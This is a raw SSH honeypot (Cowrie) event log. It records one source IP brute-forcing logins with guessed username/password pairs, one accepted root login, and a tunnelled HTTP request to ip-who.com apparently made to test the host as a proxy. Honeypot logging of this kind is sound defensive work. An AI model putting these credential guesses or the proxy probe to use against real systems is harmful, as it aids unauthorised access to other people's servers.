{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:21:33.081536Z","src_ip":"212.227.235.229","session":"46c025f61e55"}
{"eventid":"cowrie.login.failed","username":"shagrath","password":"039715582364317","message":"login attempt [shagrath/039715582364317] failed","sensor":"my-vps","timestamp":"2025-08-26T21:21:34.515859Z","src_ip":"212.227.235.229","session":"46c025f61e55"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56136,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b7df76ba26d","protocol":"ssh","message":"New connection: 212.227.235.229:56136 (1.2.3.4:22) [session: 1b7df76ba26d]","sensor":"my-vps","timestamp":"2025-08-26T21:21:36.236480Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:21:36.242192Z","src_ip":"212.227.235.229","session":"1b7df76ba26d"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:21:36.275851Z","src_ip":"212.227.235.229","session":"46c025f61e55"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:21:36.706420Z","src_ip":"212.227.235.229","session":"1b7df76ba26d"}
{"eventid":"cowrie.login.failed","username":"support","password":"1234","message":"login attempt [support/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T21:21:40.373240Z","src_ip":"212.227.235.229","session":"1b7df76ba26d"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:21:43.481460Z","src_ip":"212.227.235.229","session":"1b7df76ba26d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38982,"dst_ip":"1.2.3.4","dst_port":22,"session":"d680f29acf92","protocol":"ssh","message":"New connection: 212.227.235.229:38982 (1.2.3.4:22) [session: d680f29acf92]","sensor":"my-vps","timestamp":"2025-08-26T21:21:44.882978Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:21:45.549502Z","src_ip":"212.227.235.229","session":"d680f29acf92"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:21:45.770632Z","src_ip":"212.227.235.229","session":"d680f29acf92"}
{"eventid":"cowrie.login.failed","username":"sales","password":"sales","message":"login attempt [sales/sales] failed","sensor":"my-vps","timestamp":"2025-08-26T21:21:46.964436Z","src_ip":"212.227.235.229","session":"d680f29acf92"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:21:48.773833Z","src_ip":"212.227.235.229","session":"d680f29acf92"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49966,"dst_ip":"1.2.3.4","dst_port":22,"session":"28371a14d8b4","protocol":"ssh","message":"New connection: 212.227.235.229:49966 (1.2.3.4:22) [session: 28371a14d8b4]","sensor":"my-vps","timestamp":"2025-08-26T21:22:17.023249Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:22:17.106232Z","src_ip":"212.227.235.229","session":"28371a14d8b4"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:22:17.294139Z","src_ip":"212.227.235.229","session":"28371a14d8b4"}
{"eventid":"cowrie.login.failed","username":"cpanel","password":"72b1bd75ac87852a","message":"login attempt [cpanel/72b1bd75ac87852a] failed","sensor":"my-vps","timestamp":"2025-08-26T21:22:19.043410Z","src_ip":"212.227.235.229","session":"28371a14d8b4"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:22:20.598434Z","src_ip":"212.227.235.229","session":"28371a14d8b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45356,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa0cd28c2ae1","protocol":"ssh","message":"New connection: 212.227.235.229:45356 (1.2.3.4:22) [session: aa0cd28c2ae1]","sensor":"my-vps","timestamp":"2025-08-26T21:22:35.258239Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:22:35.264117Z","src_ip":"212.227.235.229","session":"aa0cd28c2ae1"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:22:35.533069Z","src_ip":"212.227.235.229","session":"aa0cd28c2ae1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45374,"dst_ip":"1.2.3.4","dst_port":22,"session":"2efc7ef1c496","protocol":"ssh","message":"New connection: 212.227.235.229:45374 (1.2.3.4:22) [session: 2efc7ef1c496]","sensor":"my-vps","timestamp":"2025-08-26T21:22:37.791490Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:22:37.810219Z","src_ip":"212.227.235.229","session":"2efc7ef1c496"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567890%*()","message":"login attempt [root/1234567890%*()] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:22:39.390358Z","src_ip":"212.227.235.229","session":"aa0cd28c2ae1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60546,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d879b7b959b","protocol":"ssh","message":"New connection: 212.227.235.229:60546 (1.2.3.4:22) [session: 9d879b7b959b]","sensor":"my-vps","timestamp":"2025-08-26T21:22:39.816560Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:22:39.817599Z","src_ip":"212.227.235.229","session":"9d879b7b959b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:22:40.140405Z","src_ip":"212.227.235.229","session":"9d879b7b959b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T21:22:40.380295Z","session":"aa0cd28c2ae1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T21:22:40.848267Z","src_ip":"212.227.235.229","session":"aa0cd28c2ae1"}
{"eventid":"cowrie.login.failed","username":"opc","password":"opc","message":"login attempt [opc/opc] failed","sensor":"my-vps","timestamp":"2025-08-26T21:22:41.337507Z","src_ip":"212.227.235.229","session":"9d879b7b959b"}
